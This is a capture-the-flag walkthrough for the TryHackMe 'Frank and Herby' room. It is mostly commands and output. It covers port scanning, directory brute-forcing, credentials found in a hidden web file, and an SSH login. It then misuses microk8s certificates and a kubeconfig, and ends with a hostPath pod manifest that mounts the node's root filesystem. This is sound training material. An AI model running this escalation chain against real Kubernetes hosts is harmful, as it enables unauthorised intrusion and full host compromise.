Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.

https://tryhackme.com/room/frankandherby

nmap -T4 10.10.51.121
# Host is up (0.096s latency).
# Not shown: 999 closed tcp ports (conn-refused)
# PORT   STATE SERVICE
# 22/tcp open  ssh

Expecting another port used by the webpage (flag shows 5 characters)

nmap -T5 -p- 10.10.51.121
# Discovered open port 22/tcp on 10.10.51.121
# Discovered open port 10259/tcp on 10.10.51.121
# Discovered open port 10257/tcp on 10.10.51.121
# Discovered open port 3000/tcp on 10.10.51.121
# Discovered open port 25000/tcp on 10.10.51.121
# Discovered open port 3XXXX/tcp on 10.10.51.121

The port is in the nodeport range 30000-32767

Going to that port on the instance we find the following webpage.

Alt text

Lets run through all the possible directories on the webserver. Using GoBuster for the brute force

I’m running this from a docker container so I have to update everything.

docker run -it --rm -p 8080:8080 ubuntu bash
apt update
apt install -y wget
cd ~
wget https://github.com/OJ/gobuster/releases/download/v3.6.0/gobuster_Linux_arm64.tar.gz
tar xfv gobuster_Linux_arm64.tar.gz

./gobuster version
# 36

We need the a wordlist before of paths to check.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt

./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/common.txt -n
# /assets               [Size: 169] [--> http://10.10.51.121/assets/]
# /css                  [Size: 169] [--> http://10.10.51.121/css/]
# /index.html           [Size: 4795]
# /vendor               [Size: 169] [--> http://10.10.51.121/vendor/]

# A larger one...
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/big.txt

./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/big.txt
# No Change

# Even more...
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/dirsearch.txt
./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/dirsearch.txt
# /%2e%2e//google.com   (Status: 400) [Size: 157]
# /.                    (Status: 200) [Size: 4795]
# /.XXXXXXXXXXXXXXX     (Status: 200) [Size: 50]

Lets see whats in that file /.XXXXXXXXXXXXXXX is

wget http://10.10.51.121:3XXXX/.XXXXXXXXXXXXXXX

cat .XXXXXXXXXXXXXXX
# http://frank:[email protected]

Decoding the string we get http://frank:[email protected]

Looks like login credentials, lets try it with SSH

ssh [email protected]
# frank@dev-01:~$

ls -l
# drwxrwxr-x 3 frank frank 4096 Oct 27  2021 repos
# drwxr-xr-x 3 frank frank 4096 Oct 10  2021 snap
# -rw-rw-r-- 1 frank frank   17 Oct 29  2021 user.txt

cat user.txt
# THM{}

Knowing the challenge is about microk8s lets see what thats about

which microk8s
# /snap/bin/microk8s

ls -l /snap/bin/microk8s
# lrwxrwxrwx 1 root root 13 Oct  3  2021 /snap/bin/microk8s -> /usr/bin/snap

id
# uid=1001(frank) gid=1001(frank) groups=1001(frank),998(microk8s)

microk8s inspect
# [sudo] password for frank:

Don’t have sudo permissions…

Maybe the package is vulnerable to something

snap list microk8s
# Name      Version  Rev   Tracking     Publisher   Notes
# microk8s  v1.21.5  2546  1.21/stable  canonical✓  classic

Nothing when looking, how about running processes

ps aux | grep microk8s
# python3 /snap/microk8s/2546/usr/bin/gunicorn3 cluster.agent:app --bind 0.0.0.0:25000 --keyfile /var/snap/microk8s/2546/certs/server.key --certfile /var/snap/microk8s/2546/certs/server.crt --timeout 240

Looks like a key and certificate file maybe we can authenticate against k8s…

ss -tulpn
# .......

Don’t see the default api server port (6443) Looking in the docs for microk8s it runs on 16443 which is there!

Lets get a kubectl binary on the machine! My machine died…

From our local machine download the kubectl binary and server it on a python webserver.

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
python3 -m http.server 9000 -d .

Back in the ssh session

wget http://10.6.93.142:9000/kubectl
chmod +x kubectl

./kubectl auth can-i --list --client-certificate=/var/snap/microk8s/2546/certs/server.crt --client-key=/var/snap/microk8s/2546/certs/server.key --server https://127.0.0.1:16443 --insecure-skip-tls-verify
# Resources   Non-Resource URLs   Resource Names   Verbs
# *.*         []                  []               [*]
#             [*]                 []               [*]

Also when poking around I found a entire kubeconfig (/var/snap/microk8s/2546/credentials/client.config) which gives full k8s access.

Lets see if there are any secrets in the cluster, probably not but does not hurt to check

/kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get nodes
# dev-01   Ready    <none>   2y109d   v1.21.5-3+83e2bb7ee39726

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get all -A
./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get secrets -A

Both don’t turn up much. Lets get access to the node.

apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: localhost:32000/bsnginx
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /host
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory

Put this in a file on the machine pod.yaml. We get the image from an already running container (nginx-deployment-7b548976fd-77v4r).

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config apply -f pod.yaml

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config exec -it hostmount -- bash
# root@hostmount:/#

ls /host
# bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media	mnt  opt  proc	root  run  sbin  snap  srv  sys  tmp  usr  var

ls /host/root
# root.txt  snap

cat /host/root/root.txt
# THM{}